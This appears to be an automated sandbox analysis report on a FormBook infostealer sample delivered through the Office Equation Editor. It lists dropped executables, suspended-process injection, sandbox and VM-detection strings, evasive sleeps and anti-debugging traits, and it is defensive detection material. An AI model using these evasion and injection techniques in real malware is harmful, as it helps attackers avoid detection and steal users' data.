Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_002E48B5 push eax; retf		4_2_002E48B6
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_002E29DF push eax; retf		4_2_002E29E0
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Code function: 4_2_006E1E8E push 8B032975h; retf		4_2_006E1E98

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\princedan859323.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	File created: C:\Users\user\AppData\Local\Temp\princedan859323.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Window / User API: threadDelayed 1629

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2664	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe TID: 3052	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: princedan859323.exe	Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp	Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: princedan859323.exe	Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft|VMWare|Virtual
Source: princedan859323.exe	Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Process token adjusted: Debug

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan859323.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui			Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Queries volume information: C:\Users\user\AppData\Roaming\princedan859323.exe VolumeInformation

Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\princedan859323.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY